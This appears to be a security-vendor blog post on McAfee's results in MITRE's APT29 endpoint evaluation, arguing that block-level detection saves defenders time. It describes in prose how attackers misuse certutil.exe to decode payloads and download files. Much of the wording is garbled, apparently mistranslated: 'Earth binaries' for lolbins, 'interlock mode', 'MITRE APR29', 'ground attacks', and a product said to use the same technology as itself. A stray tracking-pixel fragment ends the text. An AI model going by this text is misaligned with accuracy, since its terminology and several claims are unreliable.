In our recent Racing Bear blog we emphasized the concept of time-based security and the value of the protection a defender provides. This does not mean that blocking an attack removes the threat factor from the equation. Protection against aggression slows down the aggressor’s actions and saves valuable time for the defender’s reaction. There are three reasons for this:

  1. By blocking progress, the perpetrator is forced to change his approach and try again.
  2. Provisions at block level are by nature very professional, which increases their priority for the defenders.
  3. Defenders can target other higher priority detected events that are not blocked.

As part of the APT29 evaluation, MITRE did not allow manufacturers to use products in interlock mode in order not to interfere with testing. However, they made it possible to introduce these technologies in a non-blocking mode and participants were able to identify scenarios where products were blocked.

Device level detection has improved McAfee’s performance more than any other vendor.

In future assessments MITRE stated that the protection results would have their own categories, but in the APT29 assessment MITRE recorded the detection at block level as footnotes, as shown in Figure 1.

MITRE APT29 Evaluation – Importance of prevention in the area of endpoint security Figure 1 – Example footnote

From the defender’s point of view, more precise discoveries are possible, and more effective with increasing value. In accordance with the time-related safety requirements, the interview with the host is included in the following diagram; visual representation of the types of detection according to the evaluation.

MITRE APT29 Evaluation – Importance of prevention in the area of endpoint security Figure 2 – Moment of value for each type of detection

The evaluation of MITRE APR29 included 20 key steps for all participating suppliers and included 57 techniques, distributed over 134 substeps. One milestone was cancelled due to emulation problems, so there are still 19 milestones to go.

The following table shows the recognition graphs with the highest score for each participant. Each step represents the most important milestones in the imitation of the attacker and gives the defender the ability to defend, recognise and react.

MITRE APT29 Evaluation – Importance of prevention in the area of endpoint security Figure 3 – Type of security system with optimal coverage for each milestone

Another representation of these data is the aggregation of these peak detection values for each participant. A block modifier is also used here to fully display non-blocking detections.

Table 1 – Final change value assignment MITRE APT29 Evaluation – Importance of prevention in the area of endpoint security Figure 4 – Cumulative time protection display.

Not only did block level detection improve McAfee’s performance more than other vendors, but MVISION Endpoint was the only solution that allowed you to report such discoveries in multiple stages of an attack.

An example of this in action was entered on time:

  • Step 11 – First compromise
    • T1140 technology (decoding of files or information)
      • A.10 (Deciphering the payload of the disk embedded DLL with certutil.exe)

Earth binaries (also called lolbins) are operating system source files that can be used for purposes other than their original purpose (ab). It is known that opponents use them to bypass security checks, because most of these programs are also familiar. There are several examples that are used in a macro or from the command line. A popular choice for groups such as APT28, Turla, Oilrig and APT10 is certutil.exe. Originally designed to retrieve certificate information or to set up certificate services, but it can also be used to hide data (T1140) or to copy a remote file (T1105) for downloading files.

At the time of writing, MITRE has 70 references to the T1140 report, making it truly suitable for many offenders. Figures 5 and 6 were recorded during the evaluation of this methodology.

Figure 5 – JTI rule prevents direct instantiation of ground attacks with certutil.exe during step 11.A.10Figure 6 – JTI rule prevents direct instantiation of ground attacks with certutil.exe during step 11.

Although this coverage was provided by MVISION Endpoint, McAfee Endpoint Security 10.7 uses the same technology as McAfee Endpoint Security 10.7.

At least the report is on time. The evaluation of MITRE APT29 showed McAfee protection based on time and the difference between McAfee detection at block level. Saving time by throwing a speed bump on the Cozy Bear speedway can make all the difference when it comes to winning a race for safety.

* All data can be found at https://attackevals.mitre.org/evaluations.html?round=APT29.

2018 – 2020 MITRE Company. This work is reproduced and distributed with permission from MITRE Corporation.

x3Cimg height=1 width=1 style=display:no src=https://www.facebook.com/tr?id=766537420057144&ev=PageView&noscript=1 />x3C/noscript>’) ;

Share: